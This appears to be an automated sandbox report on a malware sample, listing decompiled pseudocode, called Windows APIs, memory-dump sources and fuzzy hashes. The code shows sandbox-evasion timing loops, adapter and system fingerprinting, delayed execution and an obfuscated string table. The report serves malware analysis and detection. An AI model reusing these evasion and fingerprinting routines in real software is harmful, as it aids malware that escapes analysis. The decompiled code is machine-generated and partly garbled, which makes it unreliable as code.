                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                C-Code - Quality: 74%
                                                                                                                                                                                                			E020D1E50(intOrPtr __ebx, intOrPtr __edx, signed long long __rax, long long __rbx, signed long long __rdx, signed long long __rsi) {
                                                                                                                                                                                                				signed int _t18;
                                                                                                                                                                                                				signed long long _t31;
                                                                                                                                                                                                				signed long long _t34;
                                                                                                                                                                                                				signed long long _t41;
                                                                                                                                                                                                				signed long long _t42;
                                                                                                                                                                                                				signed long long _t43;
                                                                                                                                                                                                				signed long long _t44;
                                                                                                                                                                                                				void* _t45;
                                                                                                                                                                                                				signed long long _t47;
                                                                                                                                                                                                				long long _t49;
                                                                                                                                                                                                				void* _t51;
                                                                                                                                                                                                				void* _t52;
                                                                                                                                                                                                
                                                                                                                                                                                                				_t47 = __rsi;
                                                                                                                                                                                                				_t41 = __rdx;
                                                                                                                                                                                                				_t31 = __rax;
                                                                                                                                                                                                				 *((long long*)(_t51 + 8)) = __rbx;
                                                                                                                                                                                                				 *((long long*)(_t51 + 0x10)) = _t49;
                                                                                                                                                                                                				 *((long long*)(_t51 + 0x18)) = __rsi;
                                                                                                                                                                                                				_push(_t45);
                                                                                                                                                                                                				_t52 = _t51 - 0x30;
                                                                                                                                                                                                				do {
                                                                                                                                                                                                					SwitchToThread();
                                                                                                                                                                                                					asm("rdtsc");
                                                                                                                                                                                                					_t42 = _t41 << 0x20;
                                                                                                                                                                                                					asm("cpuid");
                                                                                                                                                                                                					 *((intOrPtr*)(_t52 + 0x20)) = 1;
                                                                                                                                                                                                					 *((intOrPtr*)(_t52 + 0x24)) = __ebx;
                                                                                                                                                                                                					 *((intOrPtr*)(_t52 + 0x28)) = 0;
                                                                                                                                                                                                					 *((intOrPtr*)(_t52 + 0x2c)) = __edx;
                                                                                                                                                                                                					asm("rdtsc");
                                                                                                                                                                                                					_t43 = _t42 << 0x20;
                                                                                                                                                                                                					_t34 = (_t31 | _t42 | _t43) - (_t31 | _t42);
                                                                                                                                                                                                					_t45 = _t45 + _t34;
                                                                                                                                                                                                					_t18 = SwitchToThread();
                                                                                                                                                                                                					asm("rdtsc");
                                                                                                                                                                                                					_t44 = _t43 << 0x20;
                                                                                                                                                                                                					asm("rdtsc");
                                                                                                                                                                                                					_t41 = _t44 << 0x20;
                                                                                                                                                                                                					_t31 = (_t34 | _t44 | _t41) - (_t34 | _t44);
                                                                                                                                                                                                					_t47 = _t47 + _t31;
                                                                                                                                                                                                					_t49 = _t49 - 1;
                                                                                                                                                                                                				} while (_t49 != 0);
                                                                                                                                                                                                				return _t18 / _t47;
                                                                                                                                                                                                			}















                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000003.00000002.2102434980.00000000020D0000.00000040.00000001.sdmp, Offset: 020D0000, based on PE: true
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 2318fb796138583acd0950f01f63cac7e4af46243d00b3ebc09f9ecd2c5c3d1b
                                                                                                                                                                                                • Instruction ID: 54e357ad3f8772848de1f0ff237057ef140ba6ad7e7096bbbce8b69e0aa92b0d
                                                                                                                                                                                                • Opcode Fuzzy Hash: 2318fb796138583acd0950f01f63cac7e4af46243d00b3ebc09f9ecd2c5c3d1b
                                                                                                                                                                                                • Instruction Fuzzy Hash: 9C01D472B24B908BDF648F76B604349BAA2F38D7C0F148535EB9C43B19DA3CD0958B04
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Executed Functions

                                                                                                                                                                                                C-Code - Quality: 25%
                                                                                                                                                                                                			E001327BC(long long __rbx, void* __rcx, signed long long __rsi, long long __rbp, void* _a8, void* _a16, void* _a24, void* _a32) {
                                                                                                                                                                                                				void* __rdi;
                                                                                                                                                                                                				int _t23;
                                                                                                                                                                                                				void* _t24;
                                                                                                                                                                                                				void* _t27;
                                                                                                                                                                                                				intOrPtr _t35;
                                                                                                                                                                                                				void* _t36;
                                                                                                                                                                                                				intOrPtr* _t44;
                                                                                                                                                                                                				long long _t46;
                                                                                                                                                                                                				intOrPtr* _t48;
                                                                                                                                                                                                				intOrPtr* _t54;
                                                                                                                                                                                                				intOrPtr* _t62;
                                                                                                                                                                                                				signed long long _t64;
                                                                                                                                                                                                				long long* _t67;
                                                                                                                                                                                                				intOrPtr* _t69;
                                                                                                                                                                                                				void* _t77;
                                                                                                                                                                                                				void* _t78;
                                                                                                                                                                                                				struct HINSTANCE__* _t79;
                                                                                                                                                                                                				void* _t80;
                                                                                                                                                                                                				CHAR* _t82;
                                                                                                                                                                                                				char* _t83;
                                                                                                                                                                                                
                                                                                                                                                                                                				_t64 = __rsi;
                                                                                                                                                                                                				_t46 = __rbx;
                                                                                                                                                                                                				_t44 = _t69;
                                                                                                                                                                                                				 *((long long*)(_t44 + 8)) = __rbx;
                                                                                                                                                                                                				 *((long long*)(_t44 + 0x18)) = __rbp;
                                                                                                                                                                                                				 *((long long*)(_t44 + 0x20)) = __rsi;
                                                                                                                                                                                                				_push(_t62);
                                                                                                                                                                                                				_t80 = __rcx;
                                                                                                                                                                                                				_t83 = L"; _gid=";
                                                                                                                                                                                                				 *(_t44 + 0x10) =  *(_t44 + 0x10) & 0;
                                                                                                                                                                                                				LoadLibraryA(_t82);
                                                                                                                                                                                                				GetProcAddress(_t79);
                                                                                                                                                                                                				_t67 = _t44;
                                                                                                                                                                                                				if(_t44 == 0) {
                                                                                                                                                                                                					L6:
                                                                                                                                                                                                					r9d = 1;
                                                                                                                                                                                                					_t23 = E00132990(_t36, _t44, _t46, _t80, L"; _gid=", _t62, 0x1370c4, _t77, _t78);
                                                                                                                                                                                                					L7:
                                                                                                                                                                                                					return _t23;
                                                                                                                                                                                                				}
                                                                                                                                                                                                				_t24 =  *_t67(); // executed
                                                                                                                                                                                                				if(_t24 == 0x6f && __rbx != 0) {
                                                                                                                                                                                                					GetProcessHeap();
                                                                                                                                                                                                					_t9 = _t64 + 8; // 0x8
                                                                                                                                                                                                					_t36 = _t9;
                                                                                                                                                                                                					HeapAlloc(??, ??, ??);
                                                                                                                                                                                                					_t62 = _t44;
                                                                                                                                                                                                					if(_t44 == 0) {
                                                                                                                                                                                                						goto L6;
                                                                                                                                                                                                					}
                                                                                                                                                                                                					_t54 = _t44; // executed
                                                                                                                                                                                                					_t27 =  *_t67(); // executed
                                                                                                                                                                                                					if(_t27 == 0) {
                                                                                                                                                                                                						_t48 = _t62;
                                                                                                                                                                                                						do {
                                                                                                                                                                                                							if( *((char*)(_t48 + 0x1c0)) != 0x30 ||  *((char*)(_t48 + 0x1c1)) != 0x2e) {
                                                                                                                                                                                                								_t35 =  *((intOrPtr*)(_t48 + 0x194));
                                                                                                                                                                                                								if(_t54 - 1 <= 7) {
                                                                                                                                                                                                									r9d = _t35;
                                                                                                                                                                                                									_t18 = _t48 + 0x198; // 0x198
                                                                                                                                                                                                									_t54 = _t80 + _t64 * 2;
                                                                                                                                                                                                									E00132990(_t36, _t44, _t48, _t54, _t83, _t62, _t18, _t77, _t78);
                                                                                                                                                                                                									_t64 = _t64 + _t44;
                                                                                                                                                                                                									_t83 = ":";
                                                                                                                                                                                                								}
                                                                                                                                                                                                							}
                                                                                                                                                                                                							_t48 =  *_t48;
                                                                                                                                                                                                						} while (_t48 != 0);
                                                                                                                                                                                                						GetProcessHeap();
                                                                                                                                                                                                						_t36 = 0;
                                                                                                                                                                                                						_t23 = HeapFree(??, ??, ??);
                                                                                                                                                                                                						if(_t64 == 0) {
                                                                                                                                                                                                							goto L6;
                                                                                                                                                                                                						}
                                                                                                                                                                                                						goto L7;
                                                                                                                                                                                                					}
                                                                                                                                                                                                					GetProcessHeap();
                                                                                                                                                                                                					_t36 = 0;
                                                                                                                                                                                                					HeapFree(??, ??, ??);
                                                                                                                                                                                                				}
                                                                                                                                                                                                			}
























                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetAdaptersInfo.IPHLPAPI(?,?,00000000,00132CFE,?,?,00000003,001324A4), ref: 0013280F
                                                                                                                                                                                                • GetAdaptersInfo.IPHLPAPI(?,?,00000000,00132CFE,?,?,00000003,001324A4), ref: 00132845
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000004.00000002.2109607130.0000000000130000.00000040.00000001.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: AdaptersInfo
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3177971545-0
                                                                                                                                                                                                • Opcode ID: fc699fa13e68b788d874d6a78f58e359039745370b383d3aa825a9febfb906a8
                                                                                                                                                                                                • Instruction ID: 50e9f0f893d708bc17b83517d362801e943307965b22da176e9ce7698037f3c1
                                                                                                                                                                                                • Opcode Fuzzy Hash: fc699fa13e68b788d874d6a78f58e359039745370b383d3aa825a9febfb906a8
                                                                                                                                                                                                • Instruction Fuzzy Hash: B3319A76705B8192EB29EB62E8407D977A0FB49F94F494025DF0D0B758EF38C68AC340
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000004.00000002.2109607130.0000000000130000.00000040.00000001.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                                                                                • Opcode ID: c3a72f5bfcfd91918b5e83c3bb15c180b6cc2b39742bdcf2d413e26ac2e8c0cf
                                                                                                                                                                                                • Instruction ID: e48c2f226589db69a0cdb5f65fd12f50cee5f8ce1d1786c7e49f611d3749feb4
                                                                                                                                                                                                • Opcode Fuzzy Hash: c3a72f5bfcfd91918b5e83c3bb15c180b6cc2b39742bdcf2d413e26ac2e8c0cf
                                                                                                                                                                                                • Instruction Fuzzy Hash: 0071D132301B8197EB28CF66E850BE93BA5FB48BD5F448529EE4A53B14DF38D655C700
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • NtQuerySystemInformation.NTDLL(?,?,00000000,00132CB1,?,?,00000003,001324A4), ref: 001316CB
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000004.00000002.2109607130.0000000000130000.00000040.00000001.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: InformationQuerySystem
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3562636166-0
                                                                                                                                                                                                • Opcode ID: 15ab51baa947bc1f3c3fdf1eb6848148db47552542206cc3bcd8ce7c2f187386
                                                                                                                                                                                                • Instruction ID: 9ced844e3c97308a0939016c5c69f5b8d4f9ccf39b125a18bc361195d0fe11e5
                                                                                                                                                                                                • Opcode Fuzzy Hash: 15ab51baa947bc1f3c3fdf1eb6848148db47552542206cc3bcd8ce7c2f187386
                                                                                                                                                                                                • Instruction Fuzzy Hash: 11215C76315B4093EF199FA2A9443E972A2FB89BD1F1D4038EE4A47754EF3CDA468700
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000004.00000002.2113769225.000007FEF8F91000.00000020.00020000.sdmp, Offset: 000007FEF8F90000, based on PE: true
                                                                                                                                                                                                • Associated: 00000004.00000002.2113758869.000007FEF8F90000.00000002.00020000.sdmp
                                                                                                                                                                                                • Associated: 00000004.00000002.2113788239.000007FEF8F95000.00000002.00020000.sdmp
                                                                                                                                                                                                • Associated: 00000004.00000002.2113801627.000007FEF8F9E000.00000002.00020000.sdmp
                                                                                                                                                                                                • Associated: 00000004.00000002.2113811769.000007FEF8FA0000.00000002.00020000.sdmp
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: AllocVirtual
                                                                                                                                                                                                • String ID: 2$7$EiFgBnIoIsIqIrIsJhJeJfJg;o;nJjJk?dJmJnJoJpJqJrJs?d;e;f;g;h;i;j;k;l;m;n;o;p;q;r;s<d<e<f<g<h<i<j<k<l<m<n<o<p<q<r<s=d=e=f=gGh=i=j=k=j>jDd=i=pDm=kIf<eCm>gBsJm<hAf@s@e?n<n?o?r@f@m?q=e=pAf=d=i=o=l=l>pAm=l=rAp>s>o=eBd>l>pBg<d<n;iBk>i>j>r>rBf@d@g@i?hAeAfAgAhAiAjAk?qEl$G$G$G$G$G$G$G
                                                                                                                                                                                                • API String ID: 4275171209-1517691801
                                                                                                                                                                                                • Opcode ID: 9f30d811a221398f518b31910462adcca0b5cd8e48923cbb55d48ba8a3c95936
                                                                                                                                                                                                • Instruction ID: d58402523aa45de61867f6b8ded07bb346793c2564f4517cd5f4910259ccd42d
                                                                                                                                                                                                • Opcode Fuzzy Hash: 9f30d811a221398f518b31910462adcca0b5cd8e48923cbb55d48ba8a3c95936
                                                                                                                                                                                                • Instruction Fuzzy Hash: F451E1B251D6C48AE3A18B24E89479BBFA0F386358F145158E6CD4BBA9C37DC514CF44
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000004.00000002.2113769225.000007FEF8F91000.00000020.00020000.sdmp, Offset: 000007FEF8F90000, based on PE: true
                                                                                                                                                                                                • Associated: 00000004.00000002.2113758869.000007FEF8F90000.00000002.00020000.sdmp
                                                                                                                                                                                                • Associated: 00000004.00000002.2113788239.000007FEF8F95000.00000002.00020000.sdmp
                                                                                                                                                                                                • Associated: 00000004.00000002.2113801627.000007FEF8F9E000.00000002.00020000.sdmp
                                                                                                                                                                                                • Associated: 00000004.00000002.2113811769.000007FEF8FA0000.00000002.00020000.sdmp
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Thread$CreateCurrentDuplicateHandleObjectPriorityResumeSingleWait
                                                                                                                                                                                                • String ID: DllRegisterServer$G$_
                                                                                                                                                                                                • API String ID: 1174013218-1650116920
                                                                                                                                                                                                • Opcode ID: fb96d5351e15185721c7c678f22100d1a9f993aebe460c17edc53ec82f678213
                                                                                                                                                                                                • Instruction ID: 6608af3ea9cadc71cadd7eaf5fd0afc6bc6969bf4d43f0012be74416a8711f7a
                                                                                                                                                                                                • Opcode Fuzzy Hash: fb96d5351e15185721c7c678f22100d1a9f993aebe460c17edc53ec82f678213
                                                                                                                                                                                                • Instruction Fuzzy Hash: 7D31F772908B858AE764CF25F84435AB6E2F789364F504039D68C97B78EB7CD158CF40
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000004.00000002.2113769225.000007FEF8F91000.00000020.00020000.sdmp, Offset: 000007FEF8F90000, based on PE: true
                                                                                                                                                                                                • Associated: 00000004.00000002.2113758869.000007FEF8F90000.00000002.00020000.sdmp
                                                                                                                                                                                                • Associated: 00000004.00000002.2113788239.000007FEF8F95000.00000002.00020000.sdmp
                                                                                                                                                                                                • Associated: 00000004.00000002.2113801627.000007FEF8F9E000.00000002.00020000.sdmp
                                                                                                                                                                                                • Associated: 00000004.00000002.2113811769.000007FEF8FA0000.00000002.00020000.sdmp
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: AllocVirtual
                                                                                                                                                                                                • String ID: @
                                                                                                                                                                                                • API String ID: 4275171209-2766056989
                                                                                                                                                                                                • Opcode ID: 81cc5fa61e63df9641c82d5ec4088076d96df196aa3fedfd4a34d15b22035c1b
                                                                                                                                                                                                • Instruction ID: d852fcecc8c65b33074624bcc973cb4eb89098c5c099dee049a95ff6459d2f31
                                                                                                                                                                                                • Opcode Fuzzy Hash: 81cc5fa61e63df9641c82d5ec4088076d96df196aa3fedfd4a34d15b22035c1b
                                                                                                                                                                                                • Instruction Fuzzy Hash: DF326C76609BC48AD7B5CB56F49079AB7A5F7C9B90F10802AEACD93B18DB38C154CF01
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000004.00000002.2109607130.0000000000130000.00000040.00000001.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ExitProcessSleepUser
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 354099737-0
                                                                                                                                                                                                • Opcode ID: 0042952dd3aad89d8123fb1b19f0e5b4d8c6ab7462fdf89570b08f587bfd53b2
                                                                                                                                                                                                • Instruction ID: d52ed77ed79a0bb8d99ac3174ec241ce77ef4f63b5a2651200bc6424bf0e9fb8
                                                                                                                                                                                                • Opcode Fuzzy Hash: 0042952dd3aad89d8123fb1b19f0e5b4d8c6ab7462fdf89570b08f587bfd53b2
                                                                                                                                                                                                • Instruction Fuzzy Hash: B4C08C30200680D3F31D9B20E9883E82235B300705F014619E303066E08F3DA6C8C343
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000004.00000002.2113769225.000007FEF8F91000.00000020.00020000.sdmp, Offset: 000007FEF8F90000, based on PE: true
                                                                                                                                                                                                • Associated: 00000004.00000002.2113758869.000007FEF8F90000.00000002.00020000.sdmp
                                                                                                                                                                                                • Associated: 00000004.00000002.2113788239.000007FEF8F95000.00000002.00020000.sdmp
                                                                                                                                                                                                • Associated: 00000004.00000002.2113801627.000007FEF8F9E000.00000002.00020000.sdmp
                                                                                                                                                                                                • Associated: 00000004.00000002.2113811769.000007FEF8FA0000.00000002.00020000.sdmp
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: LibraryLoad
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1029625771-0
                                                                                                                                                                                                • Opcode ID: 71a4d3e6afc3869dd51c089c56fbff1864f24b1d1d871186f2474ca292a1132a
                                                                                                                                                                                                • Instruction ID: 3adc23c25f3a0f1b8435709f589f86897b1c8289c5bdacba1448a615a5bf1034
                                                                                                                                                                                                • Opcode Fuzzy Hash: 71a4d3e6afc3869dd51c089c56fbff1864f24b1d1d871186f2474ca292a1132a
                                                                                                                                                                                                • Instruction Fuzzy Hash: 19D13F76509BC486D774CB4AE49039AB7A1F3C9790F10902AEACD93B68DF78C094CF40
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • LookupAccountNameW.ADVAPI32 ref: 0013233C
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000004.00000002.2109607130.0000000000130000.00000040.00000001.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: AccountLookupName
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1484870144-0
                                                                                                                                                                                                • Opcode ID: cafe0df7641921cb4b3b83197fca258bc474e661d5f4a52d45703bbf776aa30b
                                                                                                                                                                                                • Instruction ID: 7c538186ba68006671215cca9c4c695405e4ef88748b0025c1a3b0ae564b2ca0
                                                                                                                                                                                                • Opcode Fuzzy Hash: cafe0df7641921cb4b3b83197fca258bc474e661d5f4a52d45703bbf776aa30b
                                                                                                                                                                                                • Instruction Fuzzy Hash: C6318C72701B419AEB149FB5E8843DD73A4FB48B88F588135EA4D57B18EF38D649C340
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                C-Code - Quality: 58%
                                                                                                                                                                                                			E00132434(void* __eax, signed long long __rax, signed long long __rbx, signed int __rcx, signed long long __rdx, long long __rdi, void* __rsi, void* __r9, void* __r11, void* __r14) {
                                                                                                                                                                                                				void* __rbp;
                                                                                                                                                                                                				void* _t27;
                                                                                                                                                                                                				void* _t40;
                                                                                                                                                                                                				void* _t41;
                                                                                                                                                                                                				signed long long _t51;
                                                                                                                                                                                                				signed long long _t52;
                                                                                                                                                                                                				signed long long _t64;
                                                                                                                                                                                                				long long _t69;
                                                                                                                                                                                                				void* _t73;
                                                                                                                                                                                                				void* _t75;
                                                                                                                                                                                                				void* _t82;
                                                                                                                                                                                                
                                                                                                                                                                                                				_t82 = __r9;
                                                                                                                                                                                                				_t71 = __rsi;
                                                                                                                                                                                                				_t69 = __rdi;
                                                                                                                                                                                                				_t64 = __rdx;
                                                                                                                                                                                                				_t52 = __rbx;
                                                                                                                                                                                                				_t51 = __rax;
                                                                                                                                                                                                				 *((long long*)(_t75 + 0x18)) = __rbx;
                                                                                                                                                                                                				 *((long long*)(_t75 + 0x20)) = __rdi;
                                                                                                                                                                                                				_t73 = _t75 - 0x57;
                                                                                                                                                                                                				_t4 = _t52 + 4; // 0x4
                                                                                                                                                                                                				_t40 = _t4;
                                                                                                                                                                                                				goto L1;
                                                                                                                                                                                                				L9:
                                                                                                                                                                                                				return 0;
                                                                                                                                                                                                				L1:
                                                                                                                                                                                                				asm("rdtsc");
                                                                                                                                                                                                				_t64 = _t64 << 0x20;
                                                                                                                                                                                                				_t51 = _t51 | _t64;
                                                                                                                                                                                                				_t52 = _t52 << 0x00000010 | __rcx;
                                                                                                                                                                                                				SleepEx(??, ??); // executed
                                                                                                                                                                                                				_t69 = _t69 - 1;
                                                                                                                                                                                                				if(_t69 != 0) {
                                                                                                                                                                                                					goto L1;
                                                                                                                                                                                                				} else {
                                                                                                                                                                                                					wsprintfA();
                                                                                                                                                                                                					E001311FC(_t73 - 0x29, _t52);
                                                                                                                                                                                                					_t37 = E0013153C(_t73 - 0x29);
                                                                                                                                                                                                					E00132C08( *((intOrPtr*)(_t73 + 0x17)), _t23, _t40, _t51, _t52, __rsi, _t73, _t73 - 0x49, _t82);
                                                                                                                                                                                                					_t44 = _t51;
                                                                                                                                                                                                					if(_t51 != 0) {
                                                                                                                                                                                                						_t80 = _t73 + 0x67;
                                                                                                                                                                                                						if(E00131EEC(_t37, _t44, _t51, _t52, _t73 + 0x1b, _t51, _t71, _t73, _t73 + 0x67, _t73 + 0x6f, __r11, __r14) != 0) {
                                                                                                                                                                                                							_t67 =  *((intOrPtr*)(_t73 + 0x6f));
                                                                                                                                                                                                							if( *((intOrPtr*)(_t73 + 0x6f)) >= 0x400) {
                                                                                                                                                                                                								_t27 = E0013272C(0, _t37, _t40,  *((intOrPtr*)(_t73 + 0x67)), _t67, _t69, _t73, _t80, __r11, __r14);
                                                                                                                                                                                                								_t55 =  *((intOrPtr*)(_t73 + 0x67));
                                                                                                                                                                                                								_t41 = _t27;
                                                                                                                                                                                                								if( *((intOrPtr*)(_t73 + 0x67)) != 0) {
                                                                                                                                                                                                									GetProcessHeap();
                                                                                                                                                                                                									HeapFree(??, ??, ??);
                                                                                                                                                                                                								}
                                                                                                                                                                                                								E00131FD0(_t41, _t51, _t55, _t73 - 0x49, _t71);
                                                                                                                                                                                                								_t49 = _t51;
                                                                                                                                                                                                								if(_t51 != 0) {
                                                                                                                                                                                                									E00132A1C(_t49, _t73 + 0x1b, _t51);
                                                                                                                                                                                                								}
                                                                                                                                                                                                							}
                                                                                                                                                                                                						}
                                                                                                                                                                                                					}
                                                                                                                                                                                                					goto L9;
                                                                                                                                                                                                				}
                                                                                                                                                                                                			}














                                                                                                                                                                                                0x0013249f
                                                                                                                                                                                                0x001324a4
                                                                                                                                                                                                0x001324a7
                                                                                                                                                                                                0x001324b0
                                                                                                                                                                                                0x001324bf
                                                                                                                                                                                                0x001324c1
                                                                                                                                                                                                0x001324cc
                                                                                                                                                                                                0x001324d2
                                                                                                                                                                                                0x001324d7
                                                                                                                                                                                                0x001324db
                                                                                                                                                                                                0x001324e0
                                                                                                                                                                                                0x001324e2
                                                                                                                                                                                                0x001324f0
                                                                                                                                                                                                0x001324f0
                                                                                                                                                                                                0x001324fc
                                                                                                                                                                                                0x00132501
                                                                                                                                                                                                0x00132504
                                                                                                                                                                                                0x0013250d
                                                                                                                                                                                                0x0013250d
                                                                                                                                                                                                0x00132504
                                                                                                                                                                                                0x001324cc
                                                                                                                                                                                                0x001324bf
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x001324a7

                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000004.00000002.2109607130.0000000000130000.00000040.00000001.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Sleep
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3472027048-0
                                                                                                                                                                                                • Opcode ID: 20254b6f6f1ff962b78622cb32e4c72357f2ae928b9d5189ffb1cb94102db212
                                                                                                                                                                                                • Instruction ID: 4e10f8ba0c5e140052cbfd2eafd89ba9374ab525d5bec0b4ce9de960f98b191e
                                                                                                                                                                                                • Opcode Fuzzy Hash: 20254b6f6f1ff962b78622cb32e4c72357f2ae928b9d5189ffb1cb94102db212
                                                                                                                                                                                                • Instruction Fuzzy Hash: 66219276300A409AEF14EFB1E5503ED33A1F798784F584426EE4D57658EF38E649C350
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,0000011C,00131E13), ref: 0013264B
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000004.00000002.2109607130.0000000000130000.00000040.00000001.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: InfoNativeSystem
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1721193555-0
                                                                                                                                                                                                • Opcode ID: e07d5386416b452ae357def83d54998eea7d12d9b96eaf79d3048644093a814a
                                                                                                                                                                                                • Instruction ID: e07f1bdf7f68e1c3d03a791b28d934c001d7747162864cfb4db39f1c44b0993e
                                                                                                                                                                                                • Opcode Fuzzy Hash: e07d5386416b452ae357def83d54998eea7d12d9b96eaf79d3048644093a814a
                                                                                                                                                                                                • Instruction Fuzzy Hash: 4DE09272724545C3DF28EB20E9843D93321FB94704F840122A95E026A0EF2CD75DC700
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000004.00000002.2109607130.0000000000130000.00000040.00000001.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: CreateThread
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2422867632-0
                                                                                                                                                                                                • Opcode ID: d810e3ef372af79f05ccbcc8a3c3fc3137e58aa0d92ff2561a569d39733649b8
                                                                                                                                                                                                • Instruction ID: 3ee0480e23a3d50bda3c221ad5cc292e90bcc16d9f55f45e2de3d0b52e41ffeb
                                                                                                                                                                                                • Opcode Fuzzy Hash: d810e3ef372af79f05ccbcc8a3c3fc3137e58aa0d92ff2561a569d39733649b8
                                                                                                                                                                                                • Instruction Fuzzy Hash: 19D02273F1038083F738CB20EA963DA2721F3E431AF808206EA4A44964CF3CC29DCA00
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Non-executed Functions